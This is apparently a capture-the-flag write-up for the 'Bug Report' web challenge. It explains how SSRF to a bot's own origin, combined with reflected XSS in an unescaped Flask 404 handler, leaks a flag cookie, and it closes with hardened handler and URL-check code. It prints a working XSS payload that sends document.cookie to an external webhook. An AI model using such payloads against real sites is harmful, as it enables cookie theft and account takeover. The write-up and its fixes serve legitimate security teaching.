CyberApocalypse Bug Report Writeup

Challenge

Solution

We are also given the source file here,

which had the following layout,

and the challenge itself.

The two Python scripts are as follows.

from flask import Flask, request, render_template
from urllib.parse import unquote
from bot import visit_report

app = Flask(__name__)

@app.route("/")
def index():
    return render_template("index.html")

@app.route("/api/submit", methods=["POST"])
def submit():
    try:
        url = request.json.get("url")

        assert(url.startswith('http://') or url.startswith('https://'))
        visit_report(url)

        return {"success": 1, "message": "Thank you for your valuable submition!"}
    except:
        return {"failure": 1, "message": "Something went wrong."}


@app.errorhandler(404)
def page_not_found(error):
    return "<h1>URL %s not found</h1><br/>" % unquote(request.url), 404

app.run(host="0.0.0.0", port=1337)

A brief look at it: nothing much, it just forwards the URL we report to the bot. The only other thing of note is the 404 handler, which unquotes the requested URL and drops it straight into the HTML response without escaping.

But bot.py was interesting:

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait

def visit_report(url):

    options = Options()
    options.add_argument('headless')
    options.add_argument('no-sandbox')
    options.add_argument('disable-dev-shm-usage')
    options.add_argument('disable-infobars')
    options.add_argument('disable-background-networking')
    options.add_argument('disable-default-apps')
    options.add_argument('disable-extensions')
    options.add_argument('disable-gpu')
    options.add_argument('disable-sync')
    options.add_argument('disable-translate')
    options.add_argument('hide-scrollbars')
    options.add_argument('metrics-recording-only')
    options.add_argument('mute-audio')
    options.add_argument('no-first-run')
    options.add_argument('dns-prefetch-disable')
    options.add_argument('safebrowsing-disable-auto-update')
    options.add_argument('media-cache-size=1')
    options.add_argument('disk-cache-size=1')
    options.add_argument('user-agent=BugHTB/1.0')
    browser = webdriver.Chrome('chromedriver', options=options, service_args=['--verbose', '--log-path=/tmp/chromedriver.log'])

    browser.get('http://127.0.0.1:1337/')

    browser.add_cookie({
        'name': 'flag',
        'value': 'CHTB{f4k3_fl4g_f0r_t3st1ng}'
    })

    try:
        browser.get(url)
        WebDriverWait(browser, 5).until(lambda r: r.execute_script('return document.readyState') == 'complete')
    except:
        pass
    finally:
        browser.quit()

The relevant part is this:

    browser.get('http://127.0.0.1:1337/')

    browser.add_cookie({
        'name': 'flag',
        'value': 'CHTB{f4k3_fl4g_f0r_t3st1ng}'
    })

From this piece of code we can see that the bot first loads http://127.0.0.1:1337/, sets the flag cookie for that origin, and only then visits the URL we submitted. The cookie is therefore only readable by a page served from 127.0.0.1:1337.

With that, I decided to combine SSRF and XSS:

SSRF by pointing the bot at its own origin, 127.0.0.1:1337 (the submit endpoint only checks that the URL starts with http:// or https://), and XSS via the 404 handler, which reflects the unquoted URL into the page, using a payload that sends document.cookie to a hookbin-style webhook endpoint.

My final payload was:

https://127.0.0.1:1337/<script>document.write('<img src="https://webhook.site/e923b472-7002-4b02-902d-61f0eedebbe9/?c='%2bdocument.cookie%2b'" />');</script>


A few seconds later the flag was leaked to our webhook instance.

Flag : CHTB{th1s_1s_my_bug_r3p0rt}
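For reference, the two root causes side by side with hardened versions. This is an added example, not part of the challenge source: page_not_found_vulnerable mirrors the handler above, page_not_found_hardened and is_allowed_report_url are the fixes a defender would apply, and SAMPLE_URL is a constructed request URL using a harmless test tag.

```python
from html import escape
from urllib.parse import unquote, urlsplit

# Constructed sample: a 404 request URL whose path carries URL-encoded markup.
# Browsers and Flask hand the path to the app still percent-encoded.
SAMPLE_URL = "http://127.0.0.1:1337/%3Cscript%3Etest%3C/script%3E"


def page_not_found_vulnerable(request_url: str) -> str:
    """Same logic as the challenge's 404 handler: unquote() turns %3C/%3E back
    into < and >, and the result is interpolated into HTML unescaped, so any
    markup in the path becomes live in the error page."""
    return "<h1>URL %s not found</h1><br/>" % unquote(request_url)


def page_not_found_hardened(request_url: str) -> str:
    """Fix: never unquote user input before rendering, and HTML-escape what is
    rendered so angle brackets and quotes become entities. Rendering the URL
    through a Jinja2 template with autoescaping on achieves the same thing."""
    return "<h1>URL %s not found</h1><br/>" % escape(request_url, quote=True)


def contains_live_markup(html: str) -> bool:
    """Crude detection helper: a raw <script tag anywhere in the body means the
    reflected input was rendered as markup rather than as text."""
    return "<script" in html.lower()


def is_allowed_report_url(url: str) -> bool:
    """Hypothetical replacement for the scheme-only assert in /api/submit.
    Besides requiring http(s), it refuses loopback hosts so the bot cannot be
    sent back to its own origin where the flag cookie is in scope. A complete
    fix would also resolve the hostname and reject private/loopback addresses;
    this string-level check is the minimum."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return host not in ("localhost", "127.0.0.1", "::1", "0.0.0.0")
```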